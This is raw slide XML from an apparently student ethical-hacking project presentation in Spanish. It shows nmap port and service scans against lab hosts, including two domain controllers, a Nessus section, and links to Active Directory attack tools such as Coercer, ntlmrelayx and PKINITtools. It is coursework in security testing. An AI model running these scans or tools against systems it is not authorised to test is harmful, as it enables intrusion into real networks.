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16" r:id="rId52"/>
    <p:sldId id="317" r:id="rId53"/>
    <p:sldId id="318" r:id="rId54"/>
    <p:sldId id="319" r:id="rId55"/>
    <p:sldId id="320" r:id="rId56"/>
    <p:sldId id="307" r:id="rId57"/>
    <p:sldId id="308" r:id="rId58"/>
    <p:sldId id="309" r:id="rId59"/>
    <p:sldId id="310" r:id="rId60"/>
    <p:sldId id="311" r:id="rId61"/>
    <p:sldId id="321" r:id="rId62"/>
    <p:sldId id="322" r:id="rId63"/>
    <p:sldId id="324" r:id="rId64"/>
    <p:sldId id="323" r:id="rId65"/>
    <p:sldId id="312" r:id="rId66"/>
    <p:sldId id="313" r:id="rId67"/>
    <p:sldId id="314" r:id="rId68"/>
    <p:sldId id="315"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B3103A5-AF40-4F8F-9AAF-573AD70EC745}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>23/05/2023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1944073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3103A5-AF40-4F8F-9AAF-573AD70EC745}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>23/05/2023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365534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3103A5-AF40-4F8F-9AAF-573AD70EC745}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>23/05/2023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0868EC3-427C-489D-9A2A-5A0139ED2B31}"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5751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3103A5-AF40-4F8F-9AAF-573AD70EC745}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>23/05/2023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2490977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3103A5-AF40-4F8F-9AAF-573AD70EC745}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>23/05/2023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0868EC3-427C-489D-9A2A-5A0139ED2B31}"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40877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3103A5-AF40-4F8F-9AAF-573AD70EC745}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>23/05/2023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555313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3103A5-AF40-4F8F-9AAF-573AD70EC745}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>23/05/2023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2502469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3103A5-AF40-4F8F-9AAF-573AD70EC745}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>23/05/2023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82862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3103A5-AF40-4F8F-9AAF-573AD70EC745}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>23/05/2023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2133810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3103A5-AF40-4F8F-9AAF-573AD70EC745}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>23/05/2023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184099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B3103A5-AF40-4F8F-9AAF-573AD70EC745}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>23/05/2023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2860102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B3103A5-AF40-4F8F-9AAF-573AD70EC745}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>23/05/2023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348431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B3103A5-AF40-4F8F-9AAF-573AD70EC745}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>23/05/2023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3691606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3103A5-AF40-4F8F-9AAF-573AD70EC745}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>23/05/2023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647477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3103A5-AF40-4F8F-9AAF-573AD70EC745}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>23/05/2023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0868EC3-427C-489D-9A2A-5A0139ED2B31}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3513730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0868EC3-427C-489D-9A2A-5A0139ED2B31}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AB3103A5-AF40-4F8F-9AAF-573AD70EC745}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>23/05/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400590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3103A5-AF40-4F8F-9AAF-573AD70EC745}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>23/05/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="es-E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0868EC3-427C-489D-9A2A-5A0139ED2B31}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="es-ES"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56412088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lgandx/Responde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fortra/impacket/blob/master/examples/ntlmrelayx.py" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/p0dalirius/Coercer" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/skelsec/minikerberos" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dirkjanm/PKINITtools"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D15D2C-3C7C-6A79-0A67-5396FA4440B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Presentación del Proyecto de Hacking Ético 2ª EVA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtítulo 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E41D6A92-A689-8BCA-DFB2-3B1BD21C2171}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1507067" y="4291464"/>
            <a:ext cx="7766936" cy="1096899"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Autor: Alesander Martínez Seijo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="449116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E98F66-4102-2168-2477-2251DCDAC42C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="593559"/>
            <a:ext cx="8596668" cy="5447804"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Se realizará un escaneo de puertos:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Cuadro de texto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29F826B8-7A3A-1DF7-8F19-3C6F261A5BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1505585" y="1607406"/>
            <a:ext cx="2475230" cy="171005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err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> -p- -T4 192.168.1.135</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> -p- -T4 192.168.1.80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> -p- -T4 192.168.1.79</a:t>
            </a:r>
          </a:p>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 </a:t>
            </a:r>
          </a:p>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Con la opción -p- escaneare todos los puertos de cada máquina.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1020203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AF51372-1D58-6DEE-8B1F-B6E17130D169}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="160421"/>
            <a:ext cx="8596668" cy="5880941"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Windows 10:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C891167D-2B9D-E758-C99C-AB2173068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761" y="958800"/>
            <a:ext cx="5777397" cy="3067552"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234718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18CDC59-1E8E-781B-438D-0B59D610F4D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="176463"/>
            <a:ext cx="8596668" cy="5864900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Windows Server 2019 DC02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FC6D22C-D259-A029-1E51-AB71BC764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803" y="1060393"/>
            <a:ext cx="6210534" cy="4737214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4018168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1CA13BC-0E76-DC9E-72C1-276755879C42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="417095"/>
            <a:ext cx="8596668" cy="5624267"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Windows Server DC01:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F9C3D3B-54F0-FB1B-FEAA-3ABD9F45A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803" y="1219200"/>
            <a:ext cx="6162408" cy="4973053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2259084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886AC42-E6C7-ED4B-39DE-BB45074F5C6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="352927"/>
            <a:ext cx="8596668" cy="5688436"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Se realizara un escaneo de servicios:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Cuadro de texto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFB4DD91-09CC-829B-8646-5A1AEF3BE251}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1537670" y="1487090"/>
            <a:ext cx="2475230" cy="171005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err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nmap</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sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> -p-  192.168.1.135</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nmap</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sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> -p-  192.168.1.79</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nmap</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sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> -p-  192.168.1.80</a:t>
            </a:r>
          </a:p>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 </a:t>
            </a:r>
          </a:p>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La opción -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> nos permitirá ver las versiones que corren en cada puerto.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2390914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496699C-A391-CDE6-183E-DCAD9C44B035}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="529389"/>
            <a:ext cx="8596668" cy="5511973"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Máquina Windows 10:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35CA9BFC-EA97-1762-2AAE-15AE4019C897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1521528" y="1370177"/>
            <a:ext cx="8039567" cy="4789992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1745735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72BD11-6C57-3DF4-09D6-AEF95F91E9EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="561475"/>
            <a:ext cx="8596668" cy="5479888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Windows Server DC01:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EDE60DE-CBCA-C15C-8673-7B903A3B7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761" y="1378112"/>
            <a:ext cx="6645910" cy="5247278"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2886810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02726A8-42D3-B65A-724E-DDEBB5B29BA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="497305"/>
            <a:ext cx="8596668" cy="5544057"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Windows Server DC02:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{359F8121-555E-3B3D-4A66-4E82D367C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718" y="1379620"/>
            <a:ext cx="6322829" cy="5149518"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="59742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F28E9E9-245D-C347-1036-A9C3D9C6B87D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677333" y="513347"/>
            <a:ext cx="11001319" cy="5528015"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Nessus:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Windows 10:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
